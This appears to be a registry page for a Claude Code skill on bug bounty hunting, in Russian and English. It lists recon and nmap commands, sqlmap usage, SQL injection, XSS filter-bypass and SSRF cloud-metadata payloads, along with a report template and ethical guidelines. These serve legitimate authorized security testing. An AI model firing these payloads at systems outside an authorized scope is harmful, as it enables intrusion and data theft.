Claude-skill-registry bug-bounty-program
Эксперт по bug bounty. Используй для поиска уязвимостей, написания отчётов, responsible disclosure и penetration testing.
install
source · Clone the upstream repo
git clone https://github.com/majiayu000/claude-skill-registry
Claude Code · Install into ~/.claude/skills/
T=$(mktemp -d) && git clone --depth=1 https://github.com/majiayu000/claude-skill-registry "$T" && mkdir -p ~/.claude/skills && cp -r "$T/skills/data/bug-bounty-program" ~/.claude/skills/majiayu000-claude-skill-registry-bug-bounty-program && rm -rf "$T"
manifest:
skills/data/bug-bounty-program/SKILL.mdsource content
Bug Bounty Program Specialist
Эксперт по исследованию уязвимостей и bug bounty hunting.
Методология тестирования
OWASP Top 10 Focus
- Injection (SQL, NoSQL, LDAP, OS commands)
- Broken Authentication
- Sensitive Data Exposure
- XML External Entities (XXE)
- Broken Access Control
- Security Misconfiguration
- Cross-Site Scripting (XSS)
- Insecure Deserialization
- Using Components with Known Vulnerabilities
- Insufficient Logging & Monitoring
Распределение усилий
- Reconnaissance: 30%
- Manual testing: 50%
- Automated scanning: 20%
Reconnaissance
Subdomain Enumeration
# Пассивное перечисление amass enum -passive -d target.com -o subdomains.txt # Активное перечисление subfinder -d target.com -all -o subfinder.txt # DNS брутфорс gobuster dns -d target.com -w wordlist.txt -o gobuster.txt # Объединение результатов cat subdomains.txt subfinder.txt gobuster.txt | sort -u > all_subs.txt
Technology Stack Identification
# Wappalyzer CLI wappalyzer https://target.com # WhatWeb whatweb -a 3 https://target.com # Nuclei technology detection nuclei -u https://target.com -t technologies/
Port Scanning
# Быстрое сканирование nmap -sS -sV -O -p- --min-rate 1000 target.com -oA nmap_full # Сканирование сервисов nmap -sC -sV -p 80,443,8080,8443 target.com -oA nmap_services
SQL Injection Testing
Manual Detection
-- Error-based ' OR '1'='1 ' AND '1'='2 ' UNION SELECT NULL-- -- Time-based blind '; WAITFOR DELAY '00:00:05'-- ' OR SLEEP(5)-- -- Boolean-based blind ' AND 1=1-- ' AND 1=2--
SQLMap
# Basic injection test sqlmap -u "https://target.com/page?id=1" --batch # With authentication sqlmap -u "https://target.com/page?id=1" --cookie="session=abc123" --batch # POST data sqlmap -u "https://target.com/login" --data="user=test&pass=test" --batch # Database enumeration sqlmap -u "https://target.com/page?id=1" --dbs --batch sqlmap -u "https://target.com/page?id=1" -D dbname --tables --batch
XSS Testing
Payload Types
// Reflected XSS <script>alert('XSS')</script> <img src=x onerror=alert('XSS')> <svg onload=alert('XSS')> // DOM-based XSS javascript:alert('XSS') data:text/html,<script>alert('XSS')</script> // Bypass filters <ScRiPt>alert('XSS')</ScRiPt> <img src=x onerror="alert('XSS')"> <svg/onload=alert('XSS')> // Stored XSS via different contexts "><script>alert('XSS')</script> '-alert('XSS')-' </title><script>alert('XSS')</script>
Context-Specific Payloads
// In HTML attribute " onfocus=alert('XSS') autofocus=" ' onfocus=alert('XSS') autofocus=' // In JavaScript string ';alert('XSS');// "-alert('XSS')-" // In URL parameter javascript:alert('XSS') data:text/html,<script>alert('XSS')</script>
SSRF Testing
Basic Payloads
# Localhost bypass http://127.0.0.1 http://localhost http://[::1] http://0.0.0.0 http://127.1 http://0177.0.0.1 # Cloud metadata http://169.254.169.254/latest/meta-data/ http://metadata.google.internal/
Detection Methods
# Out-of-band detection using Burp Collaborator url = "http://your-collaborator-id.burpcollaborator.net" # Webhook.site for testing url = "https://webhook.site/unique-id"
Report Writing
Structure
# Vulnerability Report ## Summary [One-line description] ## Severity [Critical/High/Medium/Low] - CVSS Score: X.X ## Affected Component [URL/Endpoint/Feature] ## Description [Detailed technical explanation] ## Steps to Reproduce 1. [Step 1] 2. [Step 2] 3. [Step 3] ## Proof of Concept [Screenshots, code, requests] ## Impact [Business/technical impact] ## Remediation [Specific recommendations] ## References [CVE, OWASP, etc.]
CVSS Calculator Factors
- Attack Vector (AV): Network/Adjacent/Local/Physical
- Attack Complexity (AC): Low/High
- Privileges Required (PR): None/Low/High
- User Interaction (UI): None/Required
- Scope (S): Unchanged/Changed
- Confidentiality Impact (C): None/Low/High
- Integrity Impact (I): None/Low/High
- Availability Impact (A): None/Low/High
Tools Checklist
Reconnaissance
- Amass / Subfinder
- Nmap
- Shodan
- Google Dorks
Web Testing
- Burp Suite
- OWASP ZAP
- SQLMap
- Nuclei
Automation
- ffuf (fuzzing)
- httpx (probing)
- waybackurls
- gau (URLs gathering)
Ethical Guidelines
- Stay in scope — тестируйте только разрешенные цели
- Don't be destructive — избегайте DoS и потери данных
- Protect data — не распространяйте найденные данные
- Report responsibly — следуйте disclosure policy
- Document everything — ведите детальные записи
- Respect rate limits — не перегружайте системы
Program Selection Strategy
Criteria
- Response time history
- Bounty amounts
- Scope breadth
- Program maturity
- Community feedback
Priority Matrix
| Program Type | Skill Level | Potential |
|---|---|---|
| New programs | Any | High |
| Broad scope | Intermediate | Medium |
| Narrow scope | Expert | Low-Medium |
| VDP only | Beginner | Low |